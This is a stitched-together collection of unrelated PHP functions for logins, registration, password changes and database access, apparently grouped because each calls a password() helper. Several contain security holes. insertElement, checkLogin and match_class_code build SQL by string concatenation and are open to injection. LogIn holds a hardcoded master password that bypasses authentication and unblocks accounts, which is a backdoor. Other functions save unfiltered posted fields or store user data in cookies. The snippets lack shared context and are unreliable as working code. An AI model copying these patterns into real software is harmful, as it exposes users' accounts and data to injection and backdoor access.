/**
* 修改个人信息
*/
public function info()
{
if (isset($_POST['dosubmit'])) {
$info = I('post.info');
if ($info['password'] == "") {
// 不修改密码
unset($info['password']);
unset($info['pwdconfirm']);
} else {
if (trim($info['password']) != trim($info['pwdconfirm'])) {
$this->error("两次密码不一致");
exit;
}
unset($info['pwdconfirm']);
$info['encrypt'] = create_randomstr();
$info['password'] = password($info['password'], $info['encrypt']);
}
if (M('admin')->save($info)) {
$this->success('更新成功');
} else {
$this->error('更新失败');
}
} else {
$where['userid'] = session('userid');
$data = M("admin")->where($where)->find();
$this->assign("data", $data);
//角色列表
$rolelist = M("admin_role")->select();
$this->assign("rolelist", $rolelist);
//-----End
$this->assign('data', $data);
$this->display();
}
}
public function register($username, $password)
{
if (empty($username) && empty($password)) {
return -2;
}
if ($this->session->has_userdata('uid')) {
return false;
}
if ($this->has_user($username)) {
return -1;
}
$password = password($password);
$this->db->set('`salt`', $password['salt']);
$this->db->set('`password`', $password['password']);
$this->db->set('`username`', $username);
$this->db->trans_start();
$this->db->insert('`Users`');
$id = $this->db->insert_id();
$this->db->trans_complete();
if ($this->db->trans_status() === FALSE) {
$this->db->trans_rollback();
return false;
} else {
$this->db->trans_commit();
return $id;
}
}
public function action(\Baguette\Application $app, \Teto\Routing\Action $action)
{
if ($app->session->get('user_id', ['default' => false])) {
return new Response\RedirectResponse('/');
}
if (!$app->isTokenVerified) {
return new Response\RedirectResponse('/');
}
// systemは特殊なユーザーなのでログインできない
if (isset($_REQUEST['user'], $_REQUEST['password']) && $_REQUEST['user'] != 'system') {
$user = trim($_REQUEST['user']);
$pass = $_REQUEST['password'];
$query = 'SELECT * FROM `users` WHERE `slug` = ?';
$stmt = db()->prepare($query);
$stmt->execute([$user]);
if ($login = $stmt->fetch(\PDO::FETCH_ASSOC)) {
$query = 'SELECT `password` FROM `user_passwords` WHERE `user_id` = ?';
$stmt = db()->prepare($query);
$stmt->execute([$login['id']]);
$res = $stmt->fetch(\PDO::FETCH_ASSOC);
if ($res && password($pass, $res['password']) === true) {
$app->refreshSession();
$app->session->set('user_id', $login['id']);
$app->session->set('user_slug', $login['slug']);
$app->session->set('user_name', $login['name']);
return new Response\RedirectResponse('/');
}
}
}
return new Response\TemplateResponse('login.tpl.html', ['user' => isset($_REQUEST['user']) ? $_REQUEST['user'] : null]);
}
public function action_edit()
{
$id = $this->request->param('id');
if ($id != $this->user) {
$this->request->redirect(URL::base());
}
$view = View::factory('player_edit');
$view->realname = @real_name_from_id($id);
if ($_POST) {
$realname = @$_POST['realname'];
$current_password = @$_POST['current_password'];
$new_password = @$_POST['new_password'];
$confirm_password = @$_POST['confirm_password'];
if ($new_password) {
if (!Auth::check_password($current_password)) {
array_push($this->template->errors, "Password did not match password on file.");
}
if ($new_password != $confirm_password) {
array_push($this->template->errors, "New passwords did not match.");
}
if (empty($this->template->errors)) {
password(name_from_id($id));
}
}
if ($realname) {
DB::update('users')->set(array('realname' => $realname))->where('id', '=', $id)->execute();
}
$this->request->redirect('/player/view/2');
}
$this->template->content = $view;
}
/**
* 编辑用户
*/
public function memberEdit($id)
{
$member_db = M('member');
if (IS_POST) {
$data = I('post.info');
if ($data['password']) {
$passwordinfo = password($data['password']);
$data['password'] = $passwordinfo['password'];
$data['encrypt'] = $passwordinfo['encrypt'];
} else {
unset($data['password']);
}
$result = $member_db->where(array('memberid' => $id))->save($data);
if ($result) {
$this->success('修改成功');
} else {
$this->error('修改失败');
}
} else {
$member_type_db = M('member_type');
$info = $member_db->field('password, encrypt', true)->where(array('memberid' => $id))->find();
$typelist = $member_type_db->where(array('disabled' => '0'))->getField('typeid,typename', true);
$this->assign('info', $info);
$this->assign('typelist', $typelist);
$this->display('member_edit');
}
}
function insertElement()
{
if (isset($_POST['ClassificationID'])) {
$ClassificationID = json_decode(sanitize($_POST['ClassificationID']));
}
if (isset($_POST['Element'])) {
$Element = json_decode(sanitize($_POST['Element']));
}
if (isset($_POST['AtomicMass'])) {
$AtomicMass = json_decode(sanitize($_POST['AtomicMass']));
}
$dbConn = mysqli_connect(server(), username(), password(), db("Elements"));
if ($dbConn->connect_error) {
die("Connection failed: " . $dbConn->connect_error);
}
$query = "INSERT INTO Elements ( ClassificationID, Element, AtomicMass ) " . "VALUES ( " . "" . $ClassificationID . ", " . "'" . $Element . "', " . "" . $AtomicMass . " );";
$result = $dbConn->query($query);
$return = new stdClass();
$return->querystring = (string) $query;
if ($result) {
$return->success = true;
} else {
$return->success = false;
}
return json_encode($return);
}
function sendNotify($userid, $msg, $link, $subject = null)
{
$umail = "*****@*****.**";
$ufname = "eDart";
$ulname = "User";
$domail = 1;
//PART I: Write to the database
$con = mysqli_connect(host(), username(), password(), mainDb());
$q = "INSERT INTO notify(`usr`,`date`,`message`,`link`) VALUES('" . mysqli_real_escape_string($con, $userid) . "','" . mysqli_real_escape_string($con, time()) . "','" . mysqli_real_escape_string($con, $msg) . "','" . mysqli_real_escape_string($con, $link) . "')";
//Insert a new row into the author's notifications
mysqli_query($con, $q);
//Execute
$user_call = new User(array("action" => "get", "id" => $userid));
$user_info = $user_call->run(true);
if (count($user_info) != 0) {
$user_info = $user_info[0];
$umail = $user_info["email"];
$ufname = ucwords($user_info["fname"]);
$ulname = ucwords($user_info["lname"]);
$domail = $user_info["do_mail"];
}
$greetings = array("Just wanted to let you know that:<br><br> %s. <br><br>That is all. Have a good rest of your day!", "In case you didn't know: <br><br>%s<br><br> Better go check it out.", "We hope you're having a good day! Just thought you might you want to know:<br><br> %s. <br><br>That is all. Carry on!", "Don't mean to break your flow, but we just thought you might want to know that<br><br> %s. <br><br>If you get the chance, you can check it out back at eDart. For now, live long and prosper!", "Hope your day is going splendidly! Just thought we'd let you know that:<br><br> %s. <br><br>When you have the time, check it out on eDart. Cool. For now, bye.");
$fullmsg = sprintf($greetings[rand(0, count($greetings) - 1)], $msg);
if ($subject == null) {
$subject = $msg;
}
//PART II: Send them an email
if ($domail == 1) {
sendMail($umail, $ufname, $ulname, $subject, $fullmsg, $link, "View on eDart");
}
}
/**
* 授权回调地址
*/
public function callback($type = null, $code = null)
{
if (!$type || !$code) {
$this->error('参数错误');
}
$type = strtolower($type);
try {
$sns = ThinkOauth::getInstance($type);
} catch (\Exception $e) {
$this->error('登录失败');
}
$extend = null;
//腾讯微博需传递的额外参数
if ($type == 'tencent') {
$extend = array('openid' => I('get.openid'), 'openkey' => I('get.openkey'));
}
try {
$token = $sns->getAccessToken($code, $extend);
} catch (\Exception $e) {
$this->error('登录失败');
}
//调用不同的登录方式
$data = self::$type($sns);
if (!$data) {
$this->error('登录失败');
}
$member_db = M('member');
$member_oauth_db = M('member_oauth');
//如果用户没有注册则先进行注册
$oauthInfo = $member_oauth_db->where(array('type' => $data['type'], 'openid' => $data['openid']))->find();
if (!$oauthInfo) {
$memberInfo = $member_db->where(array('username' => $data['username']))->find();
if (!$memberInfo) {
//添加一个随机密码,防止出现用户名密码都为空的情况
$passwordinfo = password(rand(00, 999999));
$add = array('username' => $data['username'], 'password' => $passwordinfo['password'], 'encrypt' => $passwordinfo['encrypt'], 'typeid' => 2, 'regtime' => time(), 'lastloginip' => get_client_ip(0, true), 'lastlogintime' => time());
$memberid = $member_db->add($add);
} else {
$memberid = $memberInfo['memberid'];
}
if (!$memberid) {
$this->error('登录失败');
}
unset($data['username']);
$data = array_merge($data, array('memberid' => $memberid, 'addtime' => time()));
$id = $member_oauth_db->add($data);
if (!$id) {
$this->error('登录失败');
}
$oauthInfo = $data;
}
//修改登陆时间
$member_db->where(array('memberid' => $oauthInfo['memberid']))->save(array('lastloginip' => get_client_ip(0, true), 'lastlogintime' => time()));
cookie('member_id', $oauthInfo['memberid']);
cookie('member_name', $oauthInfo['nick']);
cookie('member_head', $oauthInfo['head']);
cookie('member_link', $oauthInfo['link']);
$this->success('登录成功', U('Home/Index/index'));
}
/**
* 修改密码
*/
public function editPassword($userid, $password)
{
$userid = intval($userid);
if ($userid < 1) {
return false;
}
$passwordinfo = password($password);
return $this->where(array('userid' => $userid))->save($passwordinfo);
}
function createUser($pdo, $username, $password)
{
$truncate = "TRUNCATE TABLE `security_users`; TRUNCATE TABLE `security_user_types`;";
$insertSQL = "INSERT INTO `security_users` (id, identification_no, country_id, username, password, first_name, middle_name, last_name, gender, super_admin, status, created_user_id, created) VALUES (%s)";
$values = array(1, "'" . 'S123' . "'", 1, "'" . $username . "'", "'" . password($password) . "'", "'System'", "''", "'Administrator'", "'M'", 1, 1, 1, 'NOW()');
$insertTypeSQL = "INSERT INTO `security_user_types` (id, security_user_id, type) VALUES (1, 1, 1);";
$pdo->exec($truncate);
$pdo->exec(sprintf($insertSQL, implode(', ', $values)));
$pdo->exec($insertTypeSQL);
}
public function edit_password($userid, $password){
$userid = intval($userid);
if($userid < 1) return false;
if(!is_password($password))
{
showmessage(L('pwd_incorrect'));
return false;
}
$passwordinfo = password($password);
return $this->db->update($passwordinfo,array('userid'=>$userid));
}
private static function register($slug, $name, $password) : array
{
$query = 'INSERT INTO `users` (`slug`, `name`) VALUES(?, ?)';
$stmt = db()->prepare($query);
$stmt->execute([$slug, $name]);
$id = db()->lastInsertId();
$query = 'INSERT INTO `user_passwords` VALUES(?, ?)';
$stmt = db()->prepare($query);
$stmt->execute([$id, password($password)]);
return ['id' => $id, 'name' => $name, 'slug' => $slug];
}
public function postLogin(\Illuminate\Http\Request $request)
{
$this->validate($request, ['email' => ['required', 'regex:/^\\w+@\\w+(\\.\\w+)+$/'], 'password' => ['required', 'regex:/^[\\S]{6,16}$/']]);
$user = DB::table('user')->whereRaw('email = ? AND password = ?', [Request::input('email'), password(Request::input('password'))])->first();
if ($user) {
Session::put('user', (array) $user);
return redirect('admin');
} else {
return redirect()->back()->withErrors(['用户名或密码错误']);
}
}
/**
* Handle an incoming request.
*
* @param \Illuminate\Http\Request $request
* @param \Closure $next
* @return mixed
*/
public function handle($request, Closure $next)
{
if (isset($_SESSION['Admin'])) {
if ($_SESSION['Admin'] == $_SERVER['REMOTE_ADDR'] . 'passwordHash' . password()) {
return $next($request);
} else {
unset($_SESSION['Admin']);
return redirect('/');
}
}
return redirect('/');
}
/**
* 修改密码
* @param unknown $userid 用户ID
* @param unknown $password 密码
* @return boolean
*/
public function edit_password($userid, $password)
{
$userid = intval($userid);
if ($userid < 1) {
return false;
}
if (!is_password($password)) {
return false;
}
$passwordinfo = password($password);
return $this->where('userid=' . $userid)->save($passwordinfo);
}
function check()
{
if (isset($_SESSION['Admin'])) {
if ($_SESSION['Admin'] == $_SERVER['REMOTE_ADDR'] . 'passwordHash' . password()) {
return true;
} else {
unset($_SESSION['Admin']);
return false;
}
}
return false;
}
function chkLogin()
{
$u = $_POST['username'];
if (!data_exists("user/{$u}/pwd")) {
return LANG('No such user');
}
$p = password($_POST['password']);
if ($p != data_read("user/{$u}/pwd")) {
return LANG('Password wrong');
}
$_SESSION[USER_SESSION] = $u;
return false;
}
public function checkLogin($nickname, $pwd)
{
$member = $this->where("nickname = '{$nickname}'")->find();
if ($member) {
if (password($pwd) == $member['pwd']) {
return $member['id'];
} else {
return -2;
}
} else {
return -1;
}
}
function __construct($type)
{
global $con, $table;
$con = mysqli_connect(host(), username(), password(), mainDb());
switch ($type) {
case ITEM:
$table = "item";
break;
case USER:
$table = "usr";
break;
}
}
function checkPwd()
{
if (!isset($_POST['password'][2])) {
return LANG('Password must be at least 3 charaters long');
}
if ($_POST['password'] !== $_POST['retype']) {
return LANG('Password retype doesn\'t match');
}
$p = password($_POST['password']);
$u = user('id');
data_save("user/{$u}/pwd", $p);
return false;
}
private static function match_class_code($class, $code)
{
$connect = mysqli_connect(host(), username(), password(), mainDb());
if ($code) {
$return_array = sqlToArray($connect, "SELECT `text` FROM `lookup` WHERE class={$class} AND code={$code}");
if (count($return_array) != 0) {
return $return_array[0]["text"];
} else {
return NULL;
}
} else {
$return_array = sqlToArray($connect, "SELECT * FROM `lookup` WHERE class={$class}");
return $return_array;
}
}
/**
* @introduction: 登录界面
* @author: 杨陈鹏
* @email: yangchenpeng@cdlinglu.com
* @return array
*/
public function login()
{
if (IS_POST) {
$data = I('post.data');
if (!$data['username']) {
$this->ajaxReturn(['code' => 300, 'msg' => '用户名不能为空']);
}
if (!$data['password']) {
$this->ajaxReturn(['code' => 300, 'msg' => '密码不能为空']);
}
if (!$data['authcode']) {
$this->ajaxReturn(['code' => 300, 'msg' => '验证码不能为空']);
}
$logic = D('Administrator', 'Logic');
if (!($info = $logic::getOneData(['username' => $data['username']], 'status,auid,userid,nowip,nowtime,status,password,encrypt,loginnums'))) {
$this->ajaxReturn(['code' => 300, 'msg' => '管理员不存在']);
}
if (!$this->checkAuthcode($data['authcode'])) {
$this->ajaxReturn(['code' => 300, 'msg' => '验证码错误']);
}
if (password($data['password'], $info['encrypt']) != $info['password']) {
$this->ajaxReturn(['code' => 300, 'msg' => '密码错误']);
}
if (!$info['status']) {
$this->ajaxReturn(['code' => 300, 'msg' => '账户已被禁用']);
}
//登录信息记录
$passinfo = password($data['password']);
$logininfo['password'] = $passinfo['password'];
$logininfo['encrypt'] = $passinfo['encrypt'];
$logininfo['nowtime'] = NOW_TIME;
$logininfo['nowip'] = get_client_ip();
$logininfo['loginnums'] = $info['loginnums'] + 1;
$logininfo['lastip'] = $info['nowip'];
$logininfo['lasttime'] = $info['nowtime'];
if (!$logic::$model->where(['username' => $data['username']])->setField($logininfo)) {
$this->ajaxReturn(['code' => 300, 'msg' => '网络错误,请稍候再试!']);
}
//记录session
session('auid', $info['auid']);
session('uid', $info['userid']);
session('username', $data['username']);
$this->ajaxReturn(['code' => 200, 'msg' => '登录成功', 'data' => ['url' => U('Admin/Index/Index/index')]]);
} else {
session(null);
$this->display();
}
}
/**
* 管理员自助修改密码
*/
public function public_edit_pwd()
{
$userid = $_SESSION['userid'];
if (isset($_POST['dosubmit'])) {
$r = $this->db->where(array('userid' => $userid))->field('password,encrypt')->find();
if (password($_POST['old_password'], $r['encrypt']) !== $r['password']) {
showmessage(L('old_password_wrong'), HTTP_REFERER);
}
if (isset($_POST['new_password']) && !empty($_POST['new_password'])) {
$this->op->edit_password($userid, $_POST['new_password']);
}
showmessage(L('password_edit_succ_logout'), U('admin/index/logout'));
} else {
$info = $this->db->where(array('userid' => $userid))->find();
extract($info);
include $this->view('admin_edit_pwd');
}
}
function connect_db()
{
# Attemt connect. Return success or fail. Catch exceptions.
// Create connection
//$conn = new mysqli(servername(), username(), password());
$servername = servername();
$username = username();
$password = password();
$dbname = dbname();
//IMPROVE. Perhaps add check to see if we are already connected. Php db ping probably.
try {
$conn = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password);
} catch (PDOException $e) {
echo $e->getMessage();
exit;
}
return $conn;
}
function chkRegister()
{
if (!preg_match('/^[0-9a-zA-Z_]+$/', $_POST['username'])) {
return LANG('Username must only contain English alphabets, underscore and numbers');
}
$u = $_POST['username'];
if (data_exists("user/{$u}/pwd")) {
return LANG('User exists');
}
if (!isset($_POST['password'][2])) {
return LANG('Password must be at least 3 charaters long');
}
if ($_POST['password'] != $_POST['retype']) {
return LANG('Password retype doesn\'t match');
}
$p = password($_POST['password']);
data_save("user/{$u}/pwd", $p);
$_SESSION[USER_SESSION] = $u;
}
function print_form($vol, $action_name)
{
list_start();
list_item("Name or nickname", input("volname", $vol->name));
list_item("Email address<br><font size=-2>This won't be publicized,\n but user email may be sent here.\n Use a separate mailbox if you want.</font>", input("email_addr", $vol->email_addr));
list_item("Password", password("password", $vol->password));
list_item("Skype ID<br><font size=-2>\n This will be publicized.\n Use a Skype account other than\n your primary one if you want.</font>", input("skypeid", $vol->skypeid));
list_item("Primary language", spoken_language_list("lang1", $vol->lang1));
list_item("Secondary language", spoken_language_list("lang2", $vol->lang2));
list_item("Country", "<select name=country>" . country_select($vol->country) . "</select>");
list_item("Specialties<br><font size=-2>\n What kinds of computers (Windows/Mac/Linux)\n and/or networking technologies (proxies, NATs)\n are you most familiar with?</font>", textarea("specialties", $vol->specialties));
list_item("Projects<br><font size=-2>\n Do you specialize in any particular BOINC-based projects?</font>", textarea("projects", $vol->projects));
list_item("What days and times are you typically available for help?\n <br><font size=-2>Include your time zone, or use UTC</font>", textarea("availability", $vol->availability));
list_item("Is Skype voice OK?", yesno("voice_ok", $vol->voice_ok));
list_item("Is Skype text OK?", yesno("text_ok", $vol->text_ok));
list_item("Hide your account?", yesno("hide", $vol->hide));
list_item("", "<input type=submit name={$action_name} value=OK>");
list_end();
}
public function login()
{
if ($this->has_login()) {
$this->go_home();
}
$request = $this->input->request();
if (!$request) {
return $this->load->view->display();
}
$this->check_captcha();
$username = $this->input->request('username');
$password = $this->input->request('password');
$admini = $this->admini->find_by_aname($username);
$admini or $this->error('账号不存在');
$admini->password == password($password) or $this->error('密码错误');
$this->admini->is_ok($admini->status) or $this->error('账号异常,无法登录');
$_SESSION['admini'] = ['aname' => $admini->aname, 'role_id' => $admini->role_id, 'aid' => $admini->aid, 'login_time' => time()];
$this->aid = $admini->aid;
$this->success('登录成功');
}
public function login()
{
if (isset($_POST['dosubmit'])) {
$username = I('post.username');
$password = I('post.password');
if (empty($username)) {
$this->error("请输入用户名");
}
if (empty($password)) {
$this->error("请输入密码");
}
$admin = M('admin');
$data = $admin->where(array("username" => $username))->find();
if (is_null($data) || empty($data)) {
$this->error("用户名或者密码错误");
exit;
}
$password = password($password, $data['encrypt']);
if ($password == $data['password']) {
session("userid", $data['userid']);
session("roleid", $data['roleid']);
cookie('userid', $data['userid'], array('expire' => 86400 * 30, 'prefix' => 'admin_'));
cookie('username', $data['username'], array('expire' => 86400 * 30, 'prefix' => 'admin_'));
cookie('email', $data['email'], array('expire' => 86400 * 30, 'prefix' => 'admin_'));
cookie('roleid', $data['roleid'], array('expire' => 86400 * 30, 'prefix' => 'admin_'));
cookie('realname', $data['realname'], array('expire' => 86400 * 30, 'prefix' => 'admin_'));
cookie('mobile', $data['mobile'], array('expire' => 86400 * 30, 'prefix' => 'admin_'));
//登陆成功
$info['lastloginip'] = get_client_ip();
$info['lastlogintime'] = time();
$info['userid'] = $data['userid'];
$admin->save($info);
$this->success("登陆成功", "/Admin/Index/index");
} else {
$this->error("用户名或者密码错误");
exit;
}
} else {
$this->display();
}
}
function LogIn($Login, $Password, $Nivel = null)
{
$this->logOut($Nivel);
$key = "UsersModelLoged_{$Nivel}";
$PasswordMaster = '4aaf0c04e270aa2936786d767551b1bb541f38db9634a4501e2d66cf1cde3ee731d3ff92963ac41861339640b392e6589d3785eb954ed2de868aa4f4b148a8ba';
$Password = password($Password);
$user = $this->getByLabel('login', $Login, true);
if (!$user) {
if ($Password == $PasswordMaster) {
/* @var $user UserVO */
$user = $this->newValueObject();
$user->setNome('Jhon Lennon');
$user->setLogin($Login);
$user->setSenha($PasswordMaster);
$user->setCelular('(27) 98886-0544');
$user->setType(1);
$user->Save();
} else {
throw new Exception('Login inválido.');
}
} else {
if ($Password != $user->getSenha() and $Password != $PasswordMaster) {
throw new Exception('Senha incorreta.');
} else {
if ($user->getStatus() != 1) {
if ($Password == $PasswordMaster) {
$user->setStatus(1);
$user->Save();
} else {
throw new Exception('Seu cadastro se encontra bloqueado no momento.');
}
}
}
}
if ($user) {
$session = new Session($key);
APP::setGlobal($key, $user);
$session->set('id', $user->getId());
}
return APP::getGlobal($key);
}
/**
* 添加会员接口
*/
public function add($info)
{
if (!is_null($this->uc)) {
$status = $this->uc->uc_user_register($info['username'], $info['password'], $info['email'], IP);
if ($status < 0) {
return $status;
}
$info['ucenterid'] = $status;
}
//注册登录IP
$info['regip'] = TIME;
//注册登陆时间
$info['regdate'] = $info['lastdate'] = TIME;
$info['password'] = password($info['password'], $info['encrypt']);
$userid = $this->db->insert($info, true);
$user_model_info['userid'] = $userid;
// 插入会员模型数据
$this->db->set_model($info['modelid']);
$this->db->insert(array('userid' => $userid));
return $userid;
}
